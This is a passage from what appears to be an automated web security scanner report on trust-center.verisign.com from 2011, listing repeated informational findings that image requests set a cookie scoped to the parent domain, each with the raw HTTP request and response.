Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69374E24DB2A10DB44BAB1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 91
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a...............................!.......,.......... hs......+RR.N...}...XF.M4....1...;

9.43. https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/divider.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
........;

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/ico_questionmark.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4.......................................................
...[SNIP]...

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/logo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..=...............................................................................................................................................................................................
...[SNIP]...

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_left.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.......................................................!..XMP DataXMP<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.1-c034 46
...[SNIP]...

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89aD.T..........utt..<q.7...?<<..p..<......'#$La+.........TQR..Tfff........+......+."HEFa.1.................1......BQ'..c333..K..B......" }.&_]]..8................+,...6<%...Up.........3..?..E..0.
...[SNIP]...

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.............!.......,.............i.....0...U......t$b.G..c.%..;

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

......JFIF.....H.H.....C............................................        

       ..................C.......    ..    
   
.......................................................'...................................
...[SNIP]...

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a .................................            


............................................................ !!!"""###$$$%%%&&&'''((()))***+++,,,---...///000111222333444555666777888999:::;;;<<<===>
...[SNIP]...

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
